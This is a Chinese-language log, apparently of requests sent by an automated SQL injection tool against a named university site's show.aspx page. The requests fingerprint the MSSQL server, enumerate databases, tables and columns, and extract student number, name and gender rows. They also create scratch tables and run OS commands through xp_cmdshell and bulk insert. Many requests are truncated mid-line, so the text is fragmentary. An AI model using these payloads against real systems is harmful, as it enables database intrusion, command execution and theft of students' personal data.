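SQL注入自动扫描工具所发出的请求语句记录
内容包括猜解数据库名、表名、字段名、字段内容(表内容)、表记录条数,以及测试相关权限的请求。
(mssql/mysql;本页可见的请求均为 MSSQL 语法,如 select top、sysobjects/syscolumns、xp_cmdshell。)
注:记录按固定宽度折行,部分行似在摘录时缺失,因此有些请求并不完整。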
==================================
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20user=0--
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20user=0--
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20db_name()%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20db_name()%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20@@version%3E1--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20@@servername%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20user%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20cast(is_member(0x640062005f006f0077006e0065007200)%20as%20nvarchar(1))%2bchar
(select%20top%20%201%20dbid,name%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%20from
(select%20top%20%202%20dbid,name%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%20from
([description]%20as%20nvarchar(4000))%20from(select%20top%20%201%20*%20from%20foofoofoo%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)--%20and%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%202%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%203%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%204%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%205%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%206%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%207%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%208%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%209%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%2010%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(id%20as%20nvarchar(20))%2bchar(124)%20from%20[main]..
202%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
203%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
204%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
205%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
206%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
207%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
208%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
209%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
2010%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
2011%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20[main]..
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%201%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%202%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%203%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%204%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%205%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%206%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%207%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%208%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%209%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2010%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2011%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2012%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2013%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2014%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2015%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2016%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2017%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2018%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2019%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%
(0x64726f70207461626c6520666f6f666f6f666f6f3b435245415445205441424c45205b666f6f666f6f666f6f5d285b526573756c745478745d206e76617263686172283430303029204e554c4c
293b62756c6b20696e73657274205b666f6f666f6f666f6f5d2066726f6d2027633a5c273b416c746572205461626c65205b666f6f666f6f666f6f5d2061646420696420696e74204e4f54204e554
([type]%20as%20nvarchar(4000))%20from(select%20top%20%201%20*%20from%20foofoofoo%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20
(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%
(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%
(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%
200x730070005f004f004100430072006500610074006500,%200x780070006c006f006700370030002e0064006c006c00--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;declare%20@z%20nvarchar(4000)%20set%20@z=0x640069007200200063003a005c00%20insert%
20into%20[foofoofoo](resulttxt)%20exec%20master.dbo.xp_cmdshell%20@z;alter%20table%20[foofoofoo]%20add%20id%20int%20not%20null%20identity%20(1,1)--%20and%
201=1
GET http://xgzx.w